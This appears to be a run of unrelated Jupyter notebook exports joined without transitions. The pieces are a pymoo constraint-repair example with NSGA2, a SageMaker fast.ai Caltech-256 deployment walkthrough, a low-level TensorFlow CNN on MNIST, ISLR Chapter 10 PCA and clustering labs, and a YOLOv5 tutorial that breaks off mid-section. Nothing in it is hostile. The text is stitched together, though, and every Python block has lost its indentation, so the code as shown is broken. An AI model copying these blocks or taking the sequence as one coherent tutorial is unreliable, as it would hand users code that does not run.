& -2 \leq x_2 \leq 2 \\
& -2 \leq x_3 \leq 2
\end{split}
\end{align}
We implement the problem by squaring the constraint term and using an $\epsilon$ as explained above. The source code for the problem looks as follows:
```
import numpy as np
from pymoo.model.problem import Problem
class MyProblem(Problem):
def __init__(self):
super().__init__(n_var=3,
n_obj=2,
n_constr=1,
xl=np.array([-2, -2, -2]),
xu=np.array([2, 2, 2]))
def _evaluate(self, x, out, *args, **kwargs):
f1 = x[:, 0] ** 2 + x[:, 1] ** 2
f2 = (x[:, 0] - 1) ** 2 + x[:, 1] ** 2
g1 = (x[:, 0] + x[:, 2] - 2) ** 2 - 1e-5
out["F"] = np.column_stack([f1, f2])
out["G"] = g1
```
As you might have noticed, the problem has characteristics similar to the problem in our getting started guide.
Before a solution is evaluated a repair function is called. To make sure a solution is feasible, an approach would be to either set $x_3 = 2 - x_1$ or $x_1 = 2 - x_3$. Additionally, we need to consider that this repair might produce a variable to be out of bounds.
```
from pymoo.model.repair import Repair
class MyRepair(Repair):
def _do(self, problem, pop, **kwargs):
for k in range(len(pop)):
x = pop[k].X
if np.random.random() < 0.5:
x[2] = 2 - x[0]
if x[2] > 2:
val = x[2] - 2
x[0] += val
x[2] -= val
else:
x[0] = 2 - x[2]
if x[0] > 2:
val = x[0] - 2
x[2] += val
x[0] -= val
return pop
```
Now the algorithm object needs to be initialized with the repair operator and then can be run to solve the problem:
```
from pymoo.algorithms.nsga2 import NSGA2
algorithm = NSGA2(pop_size=100, repair=MyRepair(), eliminate_duplicates=True)
from pymoo.optimize import minimize
from pymoo.visualization.scatter import Scatter
res = minimize(MyProblem(),
algorithm,
('n_gen', 20),
seed=1,
verbose=True)
plot = Scatter()
plot.add(res.F, color="red")
plot.show()
```
In our case it is easy to verify if the constraint is violated or not:
```
print(res.X[:, 0] + res.X[:, 2])
```
If you would like to compare the solution without a repair you will see how searching only in the feasible space helps:
```
algorithm = NSGA2(pop_size=100, eliminate_duplicates=True)
res = minimize(MyProblem(),
algorithm,
('n_gen', 20),
seed=1,
verbose=True)
plot = Scatter()
plot.add(res.F, color="red")
plot.show()
print(res.X[:, 0] + res.X[:, 2])
```
Here in fact the $\epsilon$ term is necessary to find any feasible solution at all.
# Fast.ai PyTorch Caltech 256 deployment
## Pre-requisites
This notebook shows how to use the SageMaker Python SDK to test your existing trained fast.ai model in a local container before deploying to SageMaker's managed hosting environments based on the PyTorch framework. This can speed up iterative testing and debugging while using the same familiar Python SDK interface. Just change your estimator's `instance_type` to `local`.
In order to use this feature you'll need to install docker-compose (and nvidia-docker if training with a GPU).
**Note, you can only run a single local notebook at one time.**
```
!/bin/bash ./setup.sh
```
## Overview
The **SageMaker Python SDK** helps you deploy your models for training and hosting in optimized, production-ready containers in SageMaker. The SageMaker Python SDK is easy to use, modular, extensible and compatible with TensorFlow, MXNet, PyTorch and Chainer. This tutorial focuses on how to take an existing pretrained fast.ai-based convolutional neural network trained on the Caltech 256 dataset (http://www.vision.caltech.edu/Image_Datasets/Caltech256/) using **PyTorch in local mode**.
### Set up the environment
This notebook was created and tested on a single ml.m4.xlarge notebook instance.
Let's start by specifying:
- The S3 Bucket where the model data is stored.
- The Model Data prefix which is the S3 prefix to the zipped model. Must contain the weights of the fast.ai model saved with .h5 extension. Model tarball must also contain a file called `classes.json` containing list of the class names used for classification.
- The IAM role arn used to give training and hosting access to your data. See the documentation for how to create these. Note, if more than one role is required for notebook instances, training, and/or hosting, please replace the sagemaker.get_execution_role() with appropriate full IAM role arn string(s).
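The model tarball itself can be produced with `tar`. A sketch assuming the weights file and class list sit in the current directory (`model.h5` and `classes.json` are the names expected above; here we create empty placeholders for illustration, whereas in practice these are your trained weights and class list):

```shell
# Placeholder artifacts for illustration only
touch model.h5 classes.json

# Package them into the tarball layout expected by this notebook
tar -czvf model.tar.gz model.h5 classes.json

# List the archive contents to verify
tar -tzf model.tar.gz
# Then upload it, e.g.: aws s3 cp model.tar.gz s3://<your-bucket>/<prefix>/model.tar.gz
```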
```
import sagemaker
import boto3
region = boto3.session.Session().region_name
account_id = boto3.client('sts').get_caller_identity().get('Account')
bucket = 'sagemaker-{}-{}'.format(account_id, region)
model_data_prefix='models/caltech256_fastai_sagemaker/model.tar.gz'
model_data_url=f's3://{bucket}/{model_data_prefix}'
print(f'Model Data URL is: {model_data_url}')
sagemaker_session = sagemaker.Session()
role = sagemaker.get_execution_role()
```
## Host
### Hosting script
We are going to provide custom implementation of `model_fn`, `input_fn`, `output_fn` and `predict_fn` hosting functions in a separate file:
```
!pygmentize 'source/app.py'
```
### Import model into SageMaker
The PyTorch model uses an npy serializer and deserializer by default. For this example, since we have a custom implementation of all the hosting functions and plan on using a byte-based input and JSON output, we need a predictor that can deserialize JSON.
```
from sagemaker.predictor import RealTimePredictor, json_deserializer
class ImagePredictor(RealTimePredictor):
def __init__(self, endpoint_name, sagemaker_session):
super(ImagePredictor, self).__init__(endpoint_name, sagemaker_session=sagemaker_session, serializer=None,
deserializer=json_deserializer, content_type='image/jpeg')
```
To deploy the model either locally or as a SageMaker endpoint, we need to create a PyTorchModel object using the latest training job to get the S3 location of the trained model data. Besides the model data location in S3, we also need to configure PyTorchModel with the script and source directory (because our `app` script requires fast.ai model classes from the source directory) and an IAM role.
```
from sagemaker.pytorch import PyTorchModel
# Configure an PyTorch Model
pytorch_model = PyTorchModel(model_data=model_data_url,
source_dir='source',
entry_point='app.py',
role=role,
predictor_cls=ImagePredictor)
```
### Create endpoint
Now the model is ready to be deployed at a SageMaker endpoint and we are going to use the `sagemaker.pytorch.model.PyTorchModel.deploy` method to do this. We can set the value of instance type to `local` if we want to deploy and test locally on our notebook instance. Once you have tested it out locally, we can deploy as a SageMaker endpoint using a CPU-based instance for inference (e.g. ml.m4.xlarge), even though the model may have been trained on GPU instances.
```
# set the instance_type to 'local' for local testing on the instance and SageMaker instance type to deploy to AWS
instance_type='local'
#instance_type='ml.m4.xlarge'
#!docker kill $(docker ps -q)
# In Local Mode, fit will pull the PyTorch container docker image and run it locally
predictor = pytorch_model.deploy(instance_type=instance_type, initial_instance_count=1)
```
### Evaluate
We are going to use our deployed model to do object classification based on a submitted image.
```
import io
import requests
from PIL import Image
```
Enter the URL of an image from the site: http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/
```
IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/010.beer-mug/010_0011.jpg'
#IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/002.american-flag/002_0019.jpg'
#IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/038.chimp/038_0009.jpg'
```
Let's download the image from the URL and display the image.
```
response = requests.get(IMG_URL)
img_pil = Image.open(io.BytesIO(response.content))
img_pil
```
Now we will call the prediction endpoint.
```
# Serializes data and makes a prediction request to the endpoint (local or sagemaker)
response = predictor.predict(response.content)
response
```
### Cleanup
After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it.
```
sagemaker_session.delete_endpoint(predictor.endpoint)
```
Deep Learning Models -- A collection of various deep learning architectures, models, and tips for TensorFlow and PyTorch in Jupyter Notebooks.
- Author: Sebastian Raschka
- GitHub Repository: https://github.com/rasbt/deeplearning-models
```
%load_ext watermark
%watermark -a 'Sebastian Raschka' -v -p tensorflow
```
# Model Zoo -- Convolutional Neural Network
### Low-level Implementation
```
import tensorflow as tf
from functools import reduce
from tensorflow.examples.tutorials.mnist import input_data
##########################
### DATASET
##########################
mnist = input_data.read_data_sets("./", one_hot=True)
##########################
### SETTINGS
##########################
# Hyperparameters
learning_rate = 0.1
dropout_keep_proba = 0.5
epochs = 3
batch_size = 32
# Architecture
input_size = 784
image_width, image_height = 28, 28
n_classes = 10
# Other
print_interval = 500
random_seed = 123
##########################
### WRAPPER FUNCTIONS
##########################
def conv2d(input_tensor, output_channels,
kernel_size=(5, 5), strides=(1, 1, 1, 1),
padding='SAME', activation=None, seed=None,
name='conv2d'):
with tf.name_scope(name):
input_channels = input_tensor.get_shape().as_list()[-1]
weights_shape = (kernel_size[0], kernel_size[1],
input_channels, output_channels)
weights = tf.Variable(tf.truncated_normal(shape=weights_shape,
mean=0.0,
stddev=0.01,
dtype=tf.float32,
seed=seed),
name='weights')
biases = tf.Variable(tf.zeros(shape=(output_channels,)), name='biases')
conv = tf.nn.conv2d(input=input_tensor,
filter=weights,
strides=strides,
padding=padding)
act = conv + biases
if activation is not None:
act = activation(act)
return act
def fully_connected(input_tensor, output_nodes,
activation=None, seed=None,
name='fully_connected'):
with tf.name_scope(name):
input_nodes = input_tensor.get_shape().as_list()[1]
weights = tf.Variable(tf.truncated_normal(shape=(input_nodes,
output_nodes),
mean=0.0,
stddev=0.01,
dtype=tf.float32,
seed=seed),
name='weights')
biases = tf.Variable(tf.zeros(shape=[output_nodes]), name='biases')
act = tf.matmul(input_tensor, weights) + biases
if activation is not None:
act = activation(act)
return act
##########################
### GRAPH DEFINITION
##########################
g = tf.Graph()
with g.as_default():
tf.set_random_seed(random_seed)
# Input data
tf_x = tf.placeholder(tf.float32, [None, input_size, 1], name='inputs')
tf_y = tf.placeholder(tf.float32, [None, n_classes], name='targets')
keep_proba = tf.placeholder(tf.float32, shape=None, name='keep_proba')
# Convolutional Neural Network:
# 2 convolutional layers with maxpool and ReLU activation
input_layer = tf.reshape(tf_x, shape=[-1, image_width, image_height, 1])
conv1 = conv2d(input_tensor=input_layer,
output_channels=8,
kernel_size=(3, 3),
strides=(1, 1, 1, 1),
activation=tf.nn.relu,
name='conv1')
pool1 = tf.nn.max_pool(conv1,
ksize=(1, 2, 2, 1),
strides=(1, 1, 1, 1),
padding='SAME',
name='maxpool1')
conv2 = conv2d(input_tensor=pool1,
output_channels=16,
kernel_size=(3, 3),
strides=(1, 1, 1, 1),
activation=tf.nn.relu,
name='conv2')
pool2 = tf.nn.max_pool(conv2,
ksize=(1, 2, 2, 1),
strides=(1, 1, 1, 1),
padding='SAME',
name='maxpool2')
dims = pool2.get_shape().as_list()[1:]
from functools import reduce  # reduce is not a builtin in Python 3
dims = reduce(lambda x, y: x * y, dims, 1)
flat = tf.reshape(pool2, shape=(-1, dims))
fc = fully_connected(flat, output_nodes=64,
activation=tf.nn.relu)
fc = tf.nn.dropout(fc, keep_prob=keep_proba)
out_layer = fully_connected(fc, n_classes, activation=None,
name='logits')
# Loss and optimizer
loss = tf.nn.softmax_cross_entropy_with_logits(logits=out_layer, labels=tf_y)
cost = tf.reduce_mean(loss, name='cost')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train = optimizer.minimize(cost, name='train')
# Prediction
correct_prediction = tf.equal(tf.argmax(tf_y, 1),
tf.argmax(out_layer, 1),
name='correct_prediction')
accuracy = tf.reduce_mean(tf.cast(correct_prediction,
tf.float32),
name='accuracy')
import numpy as np
##########################
### TRAINING & EVALUATION
##########################
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
np.random.seed(random_seed) # random seed for mnist iterator
for epoch in range(1, epochs + 1):
avg_cost = 0.
total_batch = mnist.train.num_examples // batch_size
for i in range(total_batch):
batch_x, batch_y = mnist.train.next_batch(batch_size)
batch_x = batch_x[:, :, None] # add "missing" color channel
_, c = sess.run(['train', 'cost:0'],
feed_dict={'inputs:0': batch_x,
'targets:0': batch_y,
'keep_proba:0': dropout_keep_proba})
avg_cost += c
if not i % print_interval:
print("Minibatch: %03d | Cost: %.3f" % (i + 1, c))
train_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.train.images[:, :, None],
'targets:0': mnist.train.labels,
'keep_proba:0': 1.0})
valid_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.validation.images[:, :, None],
'targets:0': mnist.validation.labels,
'keep_proba:0': 1.0})
print("Epoch: %03d | AvgCost: %.3f" % (epoch, avg_cost / (i + 1)), end="")
print(" | Train/Valid ACC: %.3f/%.3f" % (train_acc, valid_acc))
test_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.test.images[:, :, None],
'targets:0': mnist.test.labels,
'keep_proba:0': 1.0})
print('Test ACC: %.3f' % test_acc)
```
# Chapter 10 - Unsupervised Learning
- [Lab 1: Principal Component Analysis](#Lab-1:-Principal-Component-Analysis)
- [Lab 2: K-Means Clustering](#Lab-2:-Clustering)
- [Lab 2: Hierarchical Clustering](#10.5.3-Hierarchical-Clustering)
- [Lab 3: NCI60 Data Example](#Lab-3:-NCI60-Data-Example)
```
# %load ../standard_import.txt
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import scale
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from scipy.cluster import hierarchy
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
plt.style.use('seaborn-white')
```
## Lab 1: Principal Component Analysis
```
# In R, I exported the dataset to a csv file. It is part of the base R distribution.
df = pd.read_csv('Data/USArrests.csv', index_col=0)
df.info()
df.mean()
df.var()
X = pd.DataFrame(scale(df), index=df.index, columns=df.columns)
# The loading vectors
pca_loadings = pd.DataFrame(PCA().fit(X).components_.T, index=df.columns, columns=['V1', 'V2', 'V3', 'V4'])
pca_loadings
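# (Added sketch, not in the original lab.) The loading vectors returned by
# PCA are orthonormal; a quick self-contained check on random data:
import numpy as np
from sklearn.decomposition import PCA
V_demo = PCA().fit(np.random.RandomState(0).normal(size=(30, 4))).components_.T
assert np.allclose(V_demo.T @ V_demo, np.eye(4))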
# Fit the PCA model and transform X to get the principal components
pca = PCA()
df_plot = pd.DataFrame(pca.fit_transform(X), columns=['PC1', 'PC2', 'PC3', 'PC4'], index=X.index)
df_plot
fig , ax1 = plt.subplots(figsize=(9,7))
ax1.set_xlim(-3.5,3.5)
ax1.set_ylim(-3.5,3.5)
# Plot Principal Components 1 and 2
for i in df_plot.index:
ax1.annotate(i, (df_plot.PC1.loc[i], -df_plot.PC2.loc[i]), ha='center')
# Plot reference lines
ax1.hlines(0,-3.5,3.5, linestyles='dotted', colors='grey')
ax1.vlines(0,-3.5,3.5, linestyles='dotted', colors='grey')
ax1.set_xlabel('First Principal Component')
ax1.set_ylabel('Second Principal Component')
# Plot Principal Component loading vectors, using a second y-axis.
ax2 = ax1.twinx().twiny()
ax2.set_ylim(-1,1)
ax2.set_xlim(-1,1)
ax2.tick_params(axis='y', colors='orange')
ax2.set_xlabel('Principal Component loading vectors', color='orange')
# Plot labels for vectors. Variable 'a' is a small offset parameter to separate arrow tip and text.
a = 1.07
for i in pca_loadings[['V1', 'V2']].index:
ax2.annotate(i, (pca_loadings.V1.loc[i]*a, -pca_loadings.V2.loc[i]*a), color='orange')
# Plot vectors
ax2.arrow(0,0,pca_loadings.V1[0], -pca_loadings.V2[0])
ax2.arrow(0,0,pca_loadings.V1[1], -pca_loadings.V2[1])
ax2.arrow(0,0,pca_loadings.V1[2], -pca_loadings.V2[2])
ax2.arrow(0,0,pca_loadings.V1[3], -pca_loadings.V2[3]);
# Standard deviation of the four principal components
np.sqrt(pca.explained_variance_)
pca.explained_variance_
pca.explained_variance_ratio_
plt.figure(figsize=(7,5))
plt.plot([1,2,3,4], pca.explained_variance_ratio_, '-o', label='Individual component')
plt.plot([1,2,3,4], np.cumsum(pca.explained_variance_ratio_), '-s', label='Cumulative')
plt.ylabel('Proportion of Variance Explained')
plt.xlabel('Principal Component')
plt.xlim(0.75,4.25)
plt.ylim(0,1.05)
plt.xticks([1,2,3,4])
plt.legend(loc=2);
```
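As a quick numerical check (a sketch, not part of the original lab), the proportion of variance explained is simply each component's variance divided by the total variance across all components:

```
import numpy as np
from sklearn.decomposition import PCA
from sklearn.preprocessing import scale

# Standalone demo data; the same identity holds for the USArrests fit above.
rng = np.random.RandomState(0)
X_demo = scale(rng.normal(size=(50, 4)))
pca_demo = PCA().fit(X_demo)

by_hand = pca_demo.explained_variance_ / pca_demo.explained_variance_.sum()
assert np.allclose(by_hand, pca_demo.explained_variance_ratio_)
```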
## Lab 2: Clustering
### 10.5.1 K-Means Clustering
```
# Generate data
np.random.seed(2)
X = np.random.standard_normal((50,2))
X[:25,0] = X[:25,0]+3
X[:25,1] = X[:25,1]-4
```
#### K = 2
```
km1 = KMeans(n_clusters=2, n_init=20)
km1.fit(X)
km1.labels_
```
See plot for K=2 below.
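The lab tries K = 2 and K = 3 by hand; a common way to pick K in practice is the elbow heuristic, plotting inertia (within-cluster sum of squares) against K and looking for where the drop levels off. A sketch, not part of the original lab, on the same toy data:

```
import numpy as np
from sklearn.cluster import KMeans

# Same toy data as the lab: two shifted Gaussian blobs.
np.random.seed(2)
X_demo = np.random.standard_normal((50, 2))
X_demo[:25, 0] = X_demo[:25, 0] + 3
X_demo[:25, 1] = X_demo[:25, 1] - 4

# Inertia for K = 1..6: a big drop from K=1 to K=2, then it flattens.
inertias = [KMeans(n_clusters=k, n_init=20, random_state=0).fit(X_demo).inertia_
            for k in range(1, 7)]
print([round(i, 1) for i in inertias])
```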
#### K = 3
```
np.random.seed(4)
km2 = KMeans(n_clusters=3, n_init=20)
km2.fit(X)
pd.Series(km2.labels_).value_counts()
km2.cluster_centers_
km2.labels_
# Sum of distances of samples to their closest cluster center.
km2.inertia_
fig, (ax1, ax2) = plt.subplots(1,2, figsize=(14,5))
ax1.scatter(X[:,0], X[:,1], s=40, c=km1.labels_, cmap=plt.cm.prism)
ax1.set_title('K-Means Clustering Results with K=2')
ax1.scatter(km1.cluster_centers_[:,0], km1.cluster_centers_[:,1], marker='+', s=100, c='k', linewidth=2)
ax2.scatter(X[:,0], X[:,1], s=40, c=km2.labels_, cmap=plt.cm.prism)
ax2.set_title('K-Means Clustering Results with K=3')
ax2.scatter(km2.cluster_centers_[:,0], km2.cluster_centers_[:,1], marker='+', s=100, c='k', linewidth=2);
```
### 10.5.3 Hierarchical Clustering
#### scipy
```
fig, (ax1,ax2,ax3) = plt.subplots(3,1, figsize=(15,18))
for linkage, cluster, ax in zip([hierarchy.complete(X), hierarchy.average(X), hierarchy.single(X)], ['c1','c2','c3'],
[ax1,ax2,ax3]):
cluster = hierarchy.dendrogram(linkage, ax=ax, color_threshold=0)
ax1.set_title('Complete Linkage')
ax2.set_title('Average Linkage')
ax3.set_title('Single Linkage');
```
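The dendrograms show the merge order, but not cluster assignments. To extract flat labels at a chosen number of clusters, scipy's `fcluster` can cut the tree (a sketch, not part of the original lab):

```
import numpy as np
from scipy.cluster import hierarchy

# Same toy data as the K-means section above.
np.random.seed(2)
X_demo = np.random.standard_normal((50, 2))
X_demo[:25, 0] = X_demo[:25, 0] + 3
X_demo[:25, 1] = X_demo[:25, 1] - 4

Z = hierarchy.complete(X_demo)                             # complete-linkage tree
labels = hierarchy.fcluster(Z, t=2, criterion='maxclust')  # flat labels in {1, 2}
print(np.bincount(labels)[1:])                             # cluster sizes
```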
## Lab 3: NCI60 Data Example
### § 10.6.1 PCA
```
# In R, I exported the two elements of this ISLR dataset to csv files.
# There is one file for the features and another file for the classes/types.
df2 = pd.read_csv('Data/NCI60_X.csv').drop('Unnamed: 0', axis=1)
df2.columns = np.arange(df2.columns.size)
df2.info()
X = pd.DataFrame(scale(df2))
X.shape
y = pd.read_csv('Data/NCI60_y.csv', usecols=[1], skiprows=1, names=['type'])
y.shape
y.type.value_counts()
# Fit the PCA model and transform X to get the principal components
pca2 = PCA()
df2_plot = pd.DataFrame(pca2.fit_transform(X))
fig, (ax1, ax2) = plt.subplots(1,2, figsize=(15,6))
color_idx = pd.factorize(y.type)[0]
cmap = plt.cm.hsv
# Left plot
ax1.scatter(df2_plot.iloc[:,0], -df2_plot.iloc[:,1], c=color_idx, cmap=cmap, alpha=0.5, s=50)
ax1.set_ylabel('Principal Component 2')
# Right plot
ax2.scatter(df2_plot.iloc[:,0], df2_plot.iloc[:,2], c=color_idx, cmap=cmap, alpha=0.5, s=50)
ax2.set_ylabel('Principal Component 3')
# Custom legend for the classes (y) since we do not create scatter plots per class (which could have their own labels).
handles = []
labels = pd.factorize(y.type.unique())
norm = mpl.colors.Normalize(vmin=0.0, vmax=14.0)
for i, v in zip(labels[0], labels[1]):
handles.append(mpl.patches.Patch(color=cmap(norm(i)), label=v, alpha=0.5))
ax2.legend(handles=handles, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
# xlabel for both plots
for ax in fig.axes:
ax.set_xlabel('Principal Component 1')
pd.DataFrame([df2_plot.iloc[:,:5].std(axis=0, ddof=0).to_numpy(),
pca2.explained_variance_ratio_[:5],
np.cumsum(pca2.explained_variance_ratio_[:5])],
index=['Standard Deviation', 'Proportion of Variance', 'Cumulative Proportion'],
columns=['PC1', 'PC2', 'PC3', 'PC4', 'PC5'])
df2_plot.iloc[:,:10].var(axis=0, ddof=0).plot(kind='bar', rot=0)
plt.ylabel('Variances');
fig , (ax1,ax2) = plt.subplots(1,2, figsize=(15,5))
# Left plot
ax1.plot(pca2.explained_variance_ratio_, '-o')
ax1.set_ylabel('Proportion of Variance Explained')
ax1.set_ylim(ymin=-0.01)
# Right plot
ax2.plot(np.cumsum(pca2.explained_variance_ratio_), '-ro')
ax2.set_ylabel('Cumulative Proportion of Variance Explained')
ax2.set_ylim(ymax=1.05)
for ax in fig.axes:
ax.set_xlabel('Principal Component')
ax.set_xlim(-1,65)
```
### § 10.6.2 Clustering
```
X = pd.DataFrame(scale(df2), index=y.type, columns=df2.columns)
fig, (ax1,ax2,ax3) = plt.subplots(1,3, figsize=(20,20))
for linkage, cluster, ax in zip([hierarchy.complete(X), hierarchy.average(X), hierarchy.single(X)],
['c1','c2','c3'],
[ax1,ax2,ax3]):
cluster = hierarchy.dendrogram(linkage, labels=X.index, orientation='right', color_threshold=0, leaf_font_size=10, ax=ax)
ax1.set_title('Complete Linkage')
ax2.set_title('Average Linkage')
ax3.set_title('Single Linkage');
plt.figure(figsize=(10,20))
cut4 = hierarchy.dendrogram(hierarchy.complete(X),
labels=X.index, orientation='right', color_threshold=140, leaf_font_size=10)
plt.vlines(140,0,plt.gca().yaxis.get_data_interval()[1], colors='r', linestyles='dashed');
```
##### KMeans
```
np.random.seed(2)
km4 = KMeans(n_clusters=4, n_init=50)
km4.fit(X)
km4.labels_
# Observations per KMeans cluster
pd.Series(km4.labels_).value_counts().sort_index()
```
##### Hierarchical
```
# Observations per Hierarchical cluster
cut4b = hierarchy.dendrogram(hierarchy.complete(X), truncate_mode='lastp', p=4, show_leaf_counts=True)
# Hierarchy based on Principal Components 1 to 5
plt.figure(figsize=(10,20))
pca_cluster = hierarchy.dendrogram(hierarchy.complete(df2_plot.iloc[:,:5]), labels=y.type.values, orientation='right', color_threshold=100, leaf_font_size=10)
cut4c = hierarchy.dendrogram(hierarchy.complete(df2_plot), truncate_mode='lastp', p=4,
show_leaf_counts=True)
# See also color coding in plot above.
```
<a href="https://colab.research.google.com/github/ultralytics/yolov5/blob/master/tutorial.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<img src="https://user-images.githubusercontent.com/26833433/98702494-b71c4e80-237a-11eb-87ed-17fcd6b3f066.jpg">
This is the **official YOLOv5 🚀 notebook** authored by **Ultralytics**, and is freely available for redistribution under the [GPL-3.0 license](https://choosealicense.com/licenses/gpl-3.0/).
For more information please visit https://github.com/ultralytics/yolov5 and https://www.ultralytics.com. Thank you!
# Setup
Clone repo, install dependencies and check PyTorch and GPU.
```
!git clone https://github.com/ultralytics/yolov5 # clone repo
%cd yolov5
%pip install -qr requirements.txt # install dependencies
import torch
from IPython.display import Image, clear_output # to display images
clear_output()
print(f"Setup complete. Using torch {torch.__version__} ({torch.cuda.get_device_properties(0).name if torch.cuda.is_available() else 'CPU'})")
```
# 1. Inference
`detect.py` runs YOLOv5 inference on a variety of sources, downloading models automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases), and saving results to `runs/detect`. Example inference sources are:
<img src="https://user-images.githubusercontent.com/26833433/114307955-5c7e4e80-9ae2-11eb-9f50-a90e39bee53f.png" width="900">
```
!python detect.py --weights yolov5s.pt --img 640 --conf 0.25 --source data/images/
Image(filename='runs/detect/exp/zidane.jpg', width=600)
```
# 2. Test
Test a model's accuracy on [COCO](https://cocodataset.org/#home) val or test-dev datasets. Models are downloaded automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases). To show results by class use the `--verbose` flag. Note that `pycocotools` metrics may be ~1% better than the equivalent repo metrics, as is visible below, due to slight differences in mAP computation.
## COCO val2017
Download [COCO val 2017](https://github.com/ultralytics/yolov5/blob/74b34872fdf41941cddcf243951cdb090fbac17b/data/coco.yaml#L14) dataset (1GB - 5000 images), and test model accuracy.
```
# Download COCO val2017
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco2017val.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip
# Run YOLOv5x on COCO val2017
!python test.py --weights yolov5x.pt --data coco.yaml --img 640 --iou 0.65
```
## COCO test-dev2017
Download [COCO test2017](https://github.com/ultralytics/yolov5/blob/74b34872fdf41941cddcf243951cdb090fbac17b/data/coco.yaml#L15) dataset (7GB - 40,000 images), to test model accuracy on test-dev set (**20,000 images, no labels**). Results are saved to a `*.json` file which should be **zipped** and submitted to the evaluation server at https://competitions.codalab.org/competitions/20794.
```
# Download COCO test-dev2017
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco2017labels.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip # unzip labels
!f="test2017.zip" && curl http://images.cocodataset.org/zips/$f -o $f && unzip -q $f && rm $f # 7GB, 41k images
%mv ./test2017 ../coco/images # move to /coco
# Run YOLOv5s on COCO test-dev2017 using --task test
!python test.py --weights yolov5s.pt --data coco.yaml --task test
```
# 3. Train
Download [COCO128](https://www.kaggle.com/ultralytics/coco128), a small 128-image tutorial dataset, start tensorboard and train YOLOv5s from a pretrained checkpoint for 3 epochs (note actual training is typically much longer, around **300-1000 epochs**, depending on your dataset).
```
# Download COCO128
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco128.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip
```
Train a YOLOv5s model on [COCO128](https://www.kaggle.com/ultralytics/coco128) with `--data coco128.yaml`, starting from pretrained `--weights yolov5s.pt`, or from randomly initialized `--weights '' --cfg yolov5s.yaml`. Models are downloaded automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases), and **COCO, COCO128, and VOC datasets are downloaded automatically** on first use.
All training results are saved to `runs/train/` with incrementing run directories, i.e. `runs/train/exp2`, `runs/train/exp3` etc.
```
# Tensorboard (optional)
%load_ext tensorboard
%tensorboard --logdir runs/train
# Weights & Biases (optional)
%pip install -q wandb
import wandb
wandb.login()
# Train YOLOv5s on COCO128 for 3 epochs
!python train.py --img 640 --batch 16 --epochs 3 --data coco128.yaml --weights yolov5s.pt --nosave --cache
```
# 4. Visualize
## Weights & Biases Logging 🌟 NEW
[Weights & Biases](https://wandb.ai/site?utm_campaign=repo_yolo_notebook) (W&B) is now integrated with YOLOv5 for real-time visualization and cloud logging of training runs. This allows for better run comparison and introspection, as well as improved visibility and collaboration for teams. To enable W&B `pip install wandb`, and then train normally (you will be guided through setup on first use).
During training you will see live updates at [https://wandb.ai/home](https://wandb.ai/home?utm_campaign=repo_yolo_notebook), and you can create and share detailed [Reports](https://wandb.ai/glenn-jocher/yolov5_tutorial/reports/YOLOv5-COCO128-Tutorial-Results--VmlldzozMDI5OTY) of your results. For more information see the [YOLOv5 Weights & Biases Tutorial](https://github.com/ultralytics/yolov5/issues/1289).
<img src="https://user-images.githubusercontent.com/26833433/98184457-bd3da580-1f0a-11eb-8461-95d908a71893.jpg" width="800">
## Local Logging
All results are logged by default to `runs/train`, with a new experiment directory created for each new training as `runs/train/exp2`, `runs/train/exp3`, etc. View train and test jpgs to see mosaics, labels, predictions and augmentation effects. Note a **Mosaic Dataloader** is used for training (shown below), a new concept developed by Ultralytics and first featured in [YOLOv4](https://arxiv.org/abs/2004.10934).
```
Image(filename='runs/train/exp/train_batch0.jpg', width=800) # train batch 0 mosaics and labels
Image(filename='runs/train/exp/test_batch0_labels.jpg', width=800) # test batch 0 labels
Image(filename='runs/train/exp/test_batch0_pred.jpg', width=800) # test batch 0 predictions
```
> <img src="https://user-images.githubusercontent.com/26833433/83667642-90fcb200-a583-11ea-8fa3-338bbf7da194.jpeg" width="750">
`train_batch0.jpg` shows train batch 0 mosaics and labels
> <img src="https://user-images.githubusercontent.com/26833433/83667626-8c37fe00-a583-11ea-997b-0923fe59b29b.jpeg" width="750">
`test_batch0_labels.jpg` shows test batch 0 labels
> <img src="https://user-images.githubusercontent.com/26833433/83667635-90641b80-a583-11ea-8075-606316cebb9c.jpeg" width="750">
`test_batch0_pred.jpg` shows test batch 0 _predictions_
Training losses and performance metrics are also logged to [Tensorboard](https://www.tensorflow.org/tensorboard) and a custom `results.txt` logfile which is plotted as `results.png` (below) after training completes. Here we show YOLOv5s trained on COCO128 to 300 epochs, starting from scratch (blue), and from pretrained `--weights yolov5s.pt` (orange).
```
from utils.plots import plot_results
plot_results(save_dir='runs/train/exp') # plot all results*.txt as results.png
Image(filename='runs/train/exp/results.png', width=800)
```
<img src="https://user-images.githubusercontent.com/26833433/97808309-8182b180-1c66-11eb-8461-bffe1a79511d.png" width="800">
# Environments
YOLOv5 may be run in any of the following up-to-date verified environments (with all dependencies including [CUDA](https://developer.nvidia.com/cuda)/[CUDNN](https://developer.nvidia.com/cudnn), [Python](https://www.python.org/) and [PyTorch](https://pytorch.org/) preinstalled):
